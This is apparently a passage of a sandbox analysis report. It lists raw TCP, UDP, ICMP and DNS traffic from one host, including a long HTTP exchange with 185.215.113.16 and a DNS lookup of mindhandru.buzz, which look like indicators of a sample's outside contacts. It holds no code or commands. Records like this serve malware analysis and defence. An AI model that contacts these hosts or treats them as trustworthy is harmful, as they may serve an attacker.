Dec 26, 2024 12:41:45.042231083 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.042247057 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.042273045 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.042932987 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.042984009 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.042990923 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.043008089 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.043052912 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.043684959 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.043800116 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.043813944 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.043850899 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.044490099 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.044544935 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.044550896 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.044567108 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.044611931 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.045217991 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.045286894 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.045301914 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.045396090 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.046016932 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.046067953 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.046103954 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.046120882 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.046159983 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.046725988 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.046787024 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.046802998 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.046829939 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.047498941 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.047552109 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.047574997 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.047660112 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.047734976 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.048372030 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.048439026 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.048463106 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.048480988 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.049041986 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.049093008 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.049103975 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.049133062 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.049170971 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.049865007 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.049895048 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.049930096 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.049946070 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.050569057 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.050612926 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.050718069 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.050749063 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.050797939 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.051289082 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.051321030 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.051364899 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.051398993 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.052146912 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.052191973 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.052372932 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.052464008 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.052476883 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.052508116 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.053185940 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.053198099 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.053224087 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.053225040 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.053270102 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.053827047 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.053885937 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.053899050 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.053926945 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.054573059 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.054617882 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.054620981 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.054635048 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.054675102 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.055392027 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.055455923 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.055497885 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.055560112 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.056127071 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.056169987 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.056210041 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.056224108 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.056265116 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.056885958 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.056931019 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.056942940 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.056973934 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.057637930 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.057682991 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.057688951 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.057694912 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.057738066 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.058417082 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.058478117 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.058490038 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.058543921 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.059089899 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.059129953 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.059195042 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.059199095 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.059207916 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.059257030 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.059911013 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.059956074 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.059967041 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.060007095 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.060693026 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.060750008 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.060796022 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.060807943 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.060842991 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.061383009 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.065598965 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.249265909 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.249289036 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.249300957 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.249345064 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.249484062 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.249547005 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.249553919 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.249569893 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.249603033 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.250283003 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.250328064 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.250341892 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.250374079 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.250998020 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.251044035 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.251051903 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.251079082 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.251123905 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.251744032 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.251821995 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.251862049 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:45.251988888 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:45.296252012 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:54.216377974 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:55.107043028 CET	49831	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:41:55.107094049 CET	443	49831	142.250.181.68	192.168.2.6
Dec 26, 2024 12:41:55.107157946 CET	49831	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:41:55.107368946 CET	49831	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:41:55.107392073 CET	443	49831	142.250.181.68	192.168.2.6
Dec 26, 2024 12:41:56.015814066 CET	49838	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:56.015877008 CET	443	49838	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:56.015994072 CET	49838	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:56.016606092 CET	49838	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:56.016623020 CET	443	49838	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:56.894561052 CET	443	49831	142.250.181.68	192.168.2.6
Dec 26, 2024 12:41:56.900860071 CET	49831	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:41:56.900876045 CET	443	49831	142.250.181.68	192.168.2.6
Dec 26, 2024 12:41:56.901936054 CET	443	49831	142.250.181.68	192.168.2.6
Dec 26, 2024 12:41:56.902071953 CET	49831	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:41:56.903704882 CET	49831	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:41:56.903795004 CET	443	49831	142.250.181.68	192.168.2.6
Dec 26, 2024 12:41:56.945113897 CET	49831	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:41:56.945127010 CET	443	49831	142.250.181.68	192.168.2.6
Dec 26, 2024 12:41:56.987986088 CET	49831	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:41:58.339068890 CET	443	49838	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:58.339309931 CET	49838	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:58.342827082 CET	49838	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:58.342840910 CET	443	49838	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:58.343149900 CET	443	49838	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:58.344971895 CET	49838	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:58.345133066 CET	49838	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:58.345139980 CET	443	49838	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:58.345345020 CET	49838	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:58.387341976 CET	443	49838	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:58.906006098 CET	443	49838	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:58.906203985 CET	443	49838	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:58.906301022 CET	49838	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:58.995625019 CET	49838	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:58.995661020 CET	443	49838	20.198.119.84	192.168.2.6
Dec 26, 2024 12:42:06.895076036 CET	443	49831	142.250.181.68	192.168.2.6
Dec 26, 2024 12:42:06.895138979 CET	443	49831	142.250.181.68	192.168.2.6
Dec 26, 2024 12:42:06.895198107 CET	49831	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:42:06.899027109 CET	49831	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:42:06.899039984 CET	443	49831	142.250.181.68	192.168.2.6
Dec 26, 2024 12:42:26.075901031 CET	49987	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:42:26.075952053 CET	443	49987	20.198.119.84	192.168.2.6
Dec 26, 2024 12:42:26.076050043 CET	49987	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:42:26.076603889 CET	49987	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:42:26.076622009 CET	443	49987	20.198.119.84	192.168.2.6
Dec 26, 2024 12:42:28.395499945 CET	443	49987	20.198.119.84	192.168.2.6
Dec 26, 2024 12:42:28.395591021 CET	49987	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:42:28.397201061 CET	49987	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:42:28.397209883 CET	443	49987	20.198.119.84	192.168.2.6
Dec 26, 2024 12:42:28.397469044 CET	443	49987	20.198.119.84	192.168.2.6
Dec 26, 2024 12:42:28.400638103 CET	49987	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:42:28.400696993 CET	49987	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:42:28.400702953 CET	443	49987	20.198.119.84	192.168.2.6
Dec 26, 2024 12:42:28.400825024 CET	49987	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:42:28.447336912 CET	443	49987	20.198.119.84	192.168.2.6
Dec 26, 2024 12:42:28.961155891 CET	443	49987	20.198.119.84	192.168.2.6
Dec 26, 2024 12:42:28.961518049 CET	443	49987	20.198.119.84	192.168.2.6
Dec 26, 2024 12:42:28.961622000 CET	49987	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:42:28.962584972 CET	49987	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:42:28.962606907 CET	443	49987	20.198.119.84	192.168.2.6
Dec 26, 2024 12:42:28.962615967 CET	49987	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:42:48.691881895 CET	49706	443	192.168.2.6	40.126.53.21
Dec 26, 2024 12:42:48.691952944 CET	49708	80	192.168.2.6	199.232.214.172
Dec 26, 2024 12:42:48.813235044 CET	443	49706	40.126.53.21	192.168.2.6
Dec 26, 2024 12:42:48.813855886 CET	49706	443	192.168.2.6	40.126.53.21
Dec 26, 2024 12:42:48.814157009 CET	80	49708	199.232.214.172	192.168.2.6
Dec 26, 2024 12:42:48.814227104 CET	49708	80	192.168.2.6	199.232.214.172
Dec 26, 2024 12:42:54.647075891 CET	49710	443	192.168.2.6	40.126.53.21
Dec 26, 2024 12:42:54.767215014 CET	443	49710	40.126.53.21	192.168.2.6
Dec 26, 2024 12:42:54.769006014 CET	49710	443	192.168.2.6	40.126.53.21
Dec 26, 2024 12:42:55.020838022 CET	50050	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:42:55.020905972 CET	443	50050	142.250.181.68	192.168.2.6
Dec 26, 2024 12:42:55.020992994 CET	50050	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:42:55.021316051 CET	50050	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:42:55.021362066 CET	443	50050	142.250.181.68	192.168.2.6
Dec 26, 2024 12:42:56.802033901 CET	443	50050	142.250.181.68	192.168.2.6
Dec 26, 2024 12:42:56.841996908 CET	50050	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:42:56.842072964 CET	443	50050	142.250.181.68	192.168.2.6
Dec 26, 2024 12:42:56.843556881 CET	443	50050	142.250.181.68	192.168.2.6
Dec 26, 2024 12:42:56.846621990 CET	50050	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:42:56.846726894 CET	443	50050	142.250.181.68	192.168.2.6
Dec 26, 2024 12:42:56.897577047 CET	50050	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:43:04.339334011 CET	50071	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:43:04.339374065 CET	443	50071	20.198.119.84	192.168.2.6
Dec 26, 2024 12:43:04.339445114 CET	50071	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:43:04.340044975 CET	50071	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:43:04.340056896 CET	443	50071	20.198.119.84	192.168.2.6
Dec 26, 2024 12:43:06.485738993 CET	443	50050	142.250.181.68	192.168.2.6
Dec 26, 2024 12:43:06.485887051 CET	443	50050	142.250.181.68	192.168.2.6
Dec 26, 2024 12:43:06.485976934 CET	50050	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:43:06.659349918 CET	443	50071	20.198.119.84	192.168.2.6
Dec 26, 2024 12:43:06.659446001 CET	50071	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:43:06.661154032 CET	50071	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:43:06.661165953 CET	443	50071	20.198.119.84	192.168.2.6
Dec 26, 2024 12:43:06.661393881 CET	443	50071	20.198.119.84	192.168.2.6
Dec 26, 2024 12:43:06.663033009 CET	50071	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:43:06.663110971 CET	50071	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:43:06.663117886 CET	443	50071	20.198.119.84	192.168.2.6
Dec 26, 2024 12:43:06.663252115 CET	50071	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:43:06.707340002 CET	443	50071	20.198.119.84	192.168.2.6
Dec 26, 2024 12:43:07.222980022 CET	443	50071	20.198.119.84	192.168.2.6
Dec 26, 2024 12:43:07.223048925 CET	443	50071	20.198.119.84	192.168.2.6
Dec 26, 2024 12:43:07.223160028 CET	50071	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:43:07.223331928 CET	50071	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:43:07.223357916 CET	443	50071	20.198.119.84	192.168.2.6
Dec 26, 2024 12:43:07.301919937 CET	50050	443	192.168.2.6	142.250.181.68
Dec 26, 2024 12:43:07.301965952 CET	443	50050	142.250.181.68	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 12:41:15.265974998 CET	64375	53	192.168.2.6	1.1.1.1
Dec 26, 2024 12:41:15.410351992 CET	53	64375	1.1.1.1	192.168.2.6
Dec 26, 2024 12:41:50.477880955 CET	53	64505	1.1.1.1	192.168.2.6
Dec 26, 2024 12:41:50.545309067 CET	53	62442	1.1.1.1	192.168.2.6
Dec 26, 2024 12:41:53.483788013 CET	53	57384	1.1.1.1	192.168.2.6
Dec 26, 2024 12:41:54.968904972 CET	53338	53	192.168.2.6	1.1.1.1
Dec 26, 2024 12:41:54.969300985 CET	65148	53	192.168.2.6	1.1.1.1
Dec 26, 2024 12:41:55.105829000 CET	53	53338	1.1.1.1	192.168.2.6
Dec 26, 2024 12:41:55.105999947 CET	53	65148	1.1.1.1	192.168.2.6
Dec 26, 2024 12:41:56.953577042 CET	63801	53	192.168.2.6	1.1.1.1
Dec 26, 2024 12:41:56.953723907 CET	57010	53	192.168.2.6	1.1.1.1
Dec 26, 2024 12:42:00.152637959 CET	57005	53	192.168.2.6	1.1.1.1
Dec 26, 2024 12:42:00.152908087 CET	51779	53	192.168.2.6	1.1.1.1
Dec 26, 2024 12:42:05.331650972 CET	53	51108	1.1.1.1	192.168.2.6
Dec 26, 2024 12:42:07.537702084 CET	55522	53	192.168.2.6	1.1.1.1
Dec 26, 2024 12:42:07.537847996 CET	55366	53	192.168.2.6	1.1.1.1
Dec 26, 2024 12:42:10.423418999 CET	53	63023	1.1.1.1	192.168.2.6
Dec 26, 2024 12:42:29.423682928 CET	53	53009	1.1.1.1	192.168.2.6
Dec 26, 2024 12:42:50.358371019 CET	53	52302	1.1.1.1	192.168.2.6
Dec 26, 2024 12:42:52.454859972 CET	53	49387	1.1.1.1	192.168.2.6

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 26, 2024 12:42:12.353894949 CET	192.168.2.6	1.1.1.1	c266	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 26, 2024 12:41:15.265974998 CET	192.168.2.6	1.1.1.1	0x9c29	Standard query (0)	mindhandru.buzz	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:41:54.968904972 CET	192.168.2.6	1.1.1.1	0x4818	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:41:54.969300985 CET	192.168.2.6	1.1.1.1	0x78aa	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 26, 2024 12:41:56.953577042 CET	192.168.2.6	1.1.1.1	0x3065	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:41:56.953723907 CET	192.168.2.6	1.1.1.1	0x90fb	Standard query (0)	js.monitor.azure.com	65	IN (0x0001)	false
Dec 26, 2024 12:42:00.152637959 CET	192.168.2.6	1.1.1.1	0x1659	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:42:00.152908087 CET	192.168.2.6	1.1.1.1	0x63e	Standard query (0)	js.monitor.azure.com	65	IN (0x0001)	false
Dec 26, 2024 12:42:07.537702084 CET	192.168.2.6	1.1.1.1	0x7a6d	Standard query (0)	mdec.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:42:07.537847996 CET	192.168.2.6	1.1.1.1	0x628b	Standard query (0)	mdec.nelreports.net	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 26, 2024 12:41:09.693442106 CET	1.1.1.1	192.168.2.6	0x1fb2	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:41:09.693442106 CET	1.1.1.1	192.168.2.6	0x1fb2	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:41:15.410351992 CET	1.1.1.1	192.168.2.6	0x9c29	No error (0)	mindhandru.buzz		104.21.11.101	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:41:15.410351992 CET	1.1.1.1	192.168.2.6	0x9c29	No error (0)	mindhandru.buzz		172.67.165.185	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:41:55.105829000 CET	1.1.1.1	192.168.2.6	0x4818	No error (0)	www.google.com		142.250.181.68	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:41:55.105999947 CET	1.1.1.1	192.168.2.6	0x78aa	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 26, 2024 12:41:57.091078043 CET	1.1.1.1	192.168.2.6	0x3065	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:41:57.091078043 CET	1.1.1.1	192.168.2.6	0x3065	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:41:57.091078043 CET	1.1.1.1	192.168.2.6	0x3065	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:41:57.091078043 CET	1.1.1.1	192.168.2.6	0x3065	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:41:57.091304064 CET	1.1.1.1	192.168.2.6	0x90fb	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:41:57.091304064 CET	1.1.1.1	192.168.2.6	0x90fb	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:41:57.092062950 CET	1.1.1.1	192.168.2.6	0xea5f	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:41:57.092062950 CET	1.1.1.1	192.168.2.6	0xea5f	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:41:57.092062950 CET	1.1.1.1	192.168.2.6	0xea5f	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:41:57.095724106 CET	1.1.1.1	192.168.2.6	0x623	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:41:59.932379007 CET	1.1.1.1	192.168.2.6	0xab00	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:41:59.933877945 CET	1.1.1.1	192.168.2.6	0x525f	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:41:59.933877945 CET	1.1.1.1	192.168.2.6	0x525f	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:41:59.933877945 CET	1.1.1.1	192.168.2.6	0x525f	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:42:00.290903091 CET	1.1.1.1	192.168.2.6	0x1659	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
